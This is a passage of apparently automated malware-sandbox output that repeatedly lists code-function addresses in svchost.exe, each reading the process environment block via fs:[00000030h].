Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032632C0 mov eax, dword ptr fs:[00000030h]	2_2_032632C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032632C0 mov eax, dword ptr fs:[00000030h]	2_2_032632C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033032C9 mov eax, dword ptr fs:[00000030h]	2_2_033032C9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03267128 mov eax, dword ptr fs:[00000030h]	2_2_03267128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03267128 mov eax, dword ptr fs:[00000030h]	2_2_03267128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF13E mov eax, dword ptr fs:[00000030h]	2_2_032EF13E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BA130 mov eax, dword ptr fs:[00000030h]	2_2_032BA130
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]	2_2_0325510F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323510D mov eax, dword ptr fs:[00000030h]	2_2_0323510D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260118 mov eax, dword ptr fs:[00000030h]	2_2_03260118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326716D mov eax, dword ptr fs:[00000030h]	2_2_0326716D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328717A mov eax, dword ptr fs:[00000030h]	2_2_0328717A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328717A mov eax, dword ptr fs:[00000030h]	2_2_0328717A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236179 mov eax, dword ptr fs:[00000030h]	2_2_03236179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A147 mov eax, dword ptr fs:[00000030h]	2_2_0322A147
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A147 mov eax, dword ptr fs:[00000030h]	2_2_0322A147
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A147 mov eax, dword ptr fs:[00000030h]	2_2_0322A147
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C314A mov eax, dword ptr fs:[00000030h]	2_2_032C314A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C314A mov eax, dword ptr fs:[00000030h]	2_2_032C314A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C314A mov eax, dword ptr fs:[00000030h]	2_2_032C314A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C314A mov eax, dword ptr fs:[00000030h]	2_2_032C314A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03303157 mov eax, dword ptr fs:[00000030h]	2_2_03303157
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03303157 mov eax, dword ptr fs:[00000030h]	2_2_03303157
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03303157 mov eax, dword ptr fs:[00000030h]	2_2_03303157
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03305149 mov eax, dword ptr fs:[00000030h]	2_2_03305149
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326415F mov eax, dword ptr fs:[00000030h]	2_2_0326415F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E1A4 mov eax, dword ptr fs:[00000030h]	2_2_0326E1A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E1A4 mov eax, dword ptr fs:[00000030h]	2_2_0326E1A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033051B6 mov eax, dword ptr fs:[00000030h]	2_2_033051B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032631BE mov eax, dword ptr fs:[00000030h]	2_2_032631BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032631BE mov eax, dword ptr fs:[00000030h]	2_2_032631BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032641BB mov ecx, dword ptr fs:[00000030h]	2_2_032641BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032641BB mov eax, dword ptr fs:[00000030h]	2_2_032641BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032641BB mov eax, dword ptr fs:[00000030h]	2_2_032641BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234180 mov eax, dword ptr fs:[00000030h]	2_2_03234180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234180 mov eax, dword ptr fs:[00000030h]	2_2_03234180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234180 mov eax, dword ptr fs:[00000030h]	2_2_03234180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03259194 mov eax, dword ptr fs:[00000030h]	2_2_03259194
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03271190 mov eax, dword ptr fs:[00000030h]	2_2_03271190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03271190 mov eax, dword ptr fs:[00000030h]	2_2_03271190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0323A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0323A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0323A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0323A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0323A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F81EE mov eax, dword ptr fs:[00000030h]	2_2_032F81EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F81EE mov eax, dword ptr fs:[00000030h]	2_2_032F81EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0325B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0325B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0325B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0325B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0325B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0325B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]	2_2_0325B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032391E5 mov eax, dword ptr fs:[00000030h]	2_2_032391E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032391E5 mov eax, dword ptr fs:[00000030h]	2_2_032391E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032281EB mov eax, dword ptr fs:[00000030h]	2_2_032281EB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032291F0 mov eax, dword ptr fs:[00000030h]	2_2_032291F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032291F0 mov eax, dword ptr fs:[00000030h]	2_2_032291F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032401F1 mov eax, dword ptr fs:[00000030h]	2_2_032401F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032401F1 mov eax, dword ptr fs:[00000030h]	2_2_032401F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032401F1 mov eax, dword ptr fs:[00000030h]	2_2_032401F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325F1F0 mov eax, dword ptr fs:[00000030h]	2_2_0325F1F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325F1F0 mov eax, dword ptr fs:[00000030h]	2_2_0325F1F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032401C0 mov eax, dword ptr fs:[00000030h]	2_2_032401C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032401C0 mov eax, dword ptr fs:[00000030h]	2_2_032401C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032451C0 mov eax, dword ptr fs:[00000030h]	2_2_032451C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032451C0 mov eax, dword ptr fs:[00000030h]	2_2_032451C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032451C0 mov eax, dword ptr fs:[00000030h]	2_2_032451C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032451C0 mov eax, dword ptr fs:[00000030h]	2_2_032451C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D02D mov eax, dword ptr fs:[00000030h]	2_2_0322D02D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03255004 mov eax, dword ptr fs:[00000030h]	2_2_03255004
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03255004 mov ecx, dword ptr fs:[00000030h]	2_2_03255004
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238009 mov eax, dword ptr fs:[00000030h]	2_2_03238009
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272010 mov ecx, dword ptr fs:[00000030h]	2_2_03272010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D9060 mov eax, dword ptr fs:[00000030h]	2_2_032D9060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03237072 mov eax, dword ptr fs:[00000030h]	2_2_03237072
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236074 mov eax, dword ptr fs:[00000030h]	2_2_03236074
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236074 mov eax, dword ptr fs:[00000030h]	2_2_03236074
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260044 mov eax, dword ptr fs:[00000030h]	2_2_03260044
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330505B mov eax, dword ptr fs:[00000030h]	2_2_0330505B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6040 mov eax, dword ptr fs:[00000030h]	2_2_032B6040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231051 mov eax, dword ptr fs:[00000030h]	2_2_03231051
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231051 mov eax, dword ptr fs:[00000030h]	2_2_03231051
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EB0AF mov eax, dword ptr fs:[00000030h]	2_2_032EB0AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032700A5 mov eax, dword ptr fs:[00000030h]	2_2_032700A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033050B7 mov eax, dword ptr fs:[00000030h]	2_2_033050B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_032DF0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_032DF0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_032DF0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_032DF0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_032DF0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_032DF0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_032DF0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]	2_2_032B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]	2_2_032B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]	2_2_032B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]	2_2_032B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]	2_2_032B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]	2_2_032B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]	2_2_032B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]	2_2_03304080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]	2_2_03304080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]	2_2_03304080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]	2_2_03304080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]	2_2_03304080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]	2_2_03304080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]	2_2_03304080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A093 mov ecx, dword ptr fs:[00000030h]	2_2_0322A093
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C090 mov eax, dword ptr fs:[00000030h]	2_2_0322C090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B7090 mov eax, dword ptr fs:[00000030h]	2_2_032B7090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6090 mov eax, dword ptr fs:[00000030h]	2_2_032C6090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC0E0 mov ecx, dword ptr fs:[00000030h]	2_2_032BC0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C0F6 mov eax, dword ptr fs:[00000030h]	2_2_0322C0F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326D0F0 mov eax, dword ptr fs:[00000030h]	2_2_0326D0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326D0F0 mov ecx, dword ptr fs:[00000030h]	2_2_0326D0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032290F8 mov eax, dword ptr fs:[00000030h]	2_2_032290F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032290F8 mov eax, dword ptr fs:[00000030h]	2_2_032290F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032290F8 mov eax, dword ptr fs:[00000030h]	2_2_032290F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032290F8 mov eax, dword ptr fs:[00000030h]	2_2_032290F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324B0D0 mov eax, dword ptr fs:[00000030h]	2_2_0324B0D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B0D6 mov eax, dword ptr fs:[00000030h]	2_2_0322B0D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B0D6 mov eax, dword ptr fs:[00000030h]	2_2_0322B0D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B0D6 mov eax, dword ptr fs:[00000030h]	2_2_0322B0D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B0D6 mov eax, dword ptr fs:[00000030h]	2_2_0322B0D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03259723 mov eax, dword ptr fs:[00000030h]	2_2_03259723
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323D700 mov ecx, dword ptr fs:[00000030h]	2_2_0323D700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F970B mov eax, dword ptr fs:[00000030h]	2_2_032F970B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F970B mov eax, dword ptr fs:[00000030h]	2_2_032F970B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B705 mov eax, dword ptr fs:[00000030h]	2_2_0322B705
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B705 mov eax, dword ptr fs:[00000030h]	2_2_0322B705
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B705 mov eax, dword ptr fs:[00000030h]	2_2_0322B705
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B705 mov eax, dword ptr fs:[00000030h]	2_2_0322B705
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325270D mov eax, dword ptr fs:[00000030h]	2_2_0325270D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325270D mov eax, dword ptr fs:[00000030h]	2_2_0325270D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325270D mov eax, dword ptr fs:[00000030h]	2_2_0325270D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323471B mov eax, dword ptr fs:[00000030h]	2_2_0323471B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323471B mov eax, dword ptr fs:[00000030h]	2_2_0323471B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF717 mov eax, dword ptr fs:[00000030h]	2_2_032EF717
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242760 mov ecx, dword ptr fs:[00000030h]	2_2_03242760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]	2_2_03271763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]	2_2_03271763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]	2_2_03271763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]	2_2_03271763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]	2_2_03271763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]	2_2_03271763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260774 mov eax, dword ptr fs:[00000030h]	2_2_03260774
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234779 mov eax, dword ptr fs:[00000030h]	2_2_03234779
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234779 mov eax, dword ptr fs:[00000030h]	2_2_03234779
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B174B mov eax, dword ptr fs:[00000030h]	2_2_032B174B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B174B mov ecx, dword ptr fs:[00000030h]	2_2_032B174B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03263740 mov eax, dword ptr fs:[00000030h]	2_2_03263740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326174A mov eax, dword ptr fs:[00000030h]	2_2_0326174A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]	2_2_03252755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]	2_2_03252755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]	2_2_03252755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252755 mov ecx, dword ptr fs:[00000030h]	2_2_03252755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]	2_2_03252755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]	2_2_03252755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A750 mov eax, dword ptr fs:[00000030h]	2_2_0326A750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]	2_2_0322F75B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE750 mov eax, dword ptr fs:[00000030h]	2_2_032DE750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032307A7 mov eax, dword ptr fs:[00000030h]	2_2_032307A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FD7A7 mov eax, dword ptr fs:[00000030h]	2_2_032FD7A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FD7A7 mov eax, dword ptr fs:[00000030h]	2_2_032FD7A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FD7A7 mov eax, dword ptr fs:[00000030h]	2_2_032FD7A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033017BC mov eax, dword ptr fs:[00000030h]	2_2_033017BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03261796 mov eax, dword ptr fs:[00000030h]	2_2_03261796
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03261796 mov eax, dword ptr fs:[00000030h]	2_2_03261796
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B781 mov eax, dword ptr fs:[00000030h]	2_2_0330B781
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B781 mov eax, dword ptr fs:[00000030h]	2_2_0330B781
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]	2_2_032AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E7E0 mov eax, dword ptr fs:[00000030h]	2_2_0325E7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]	2_2_032337E4
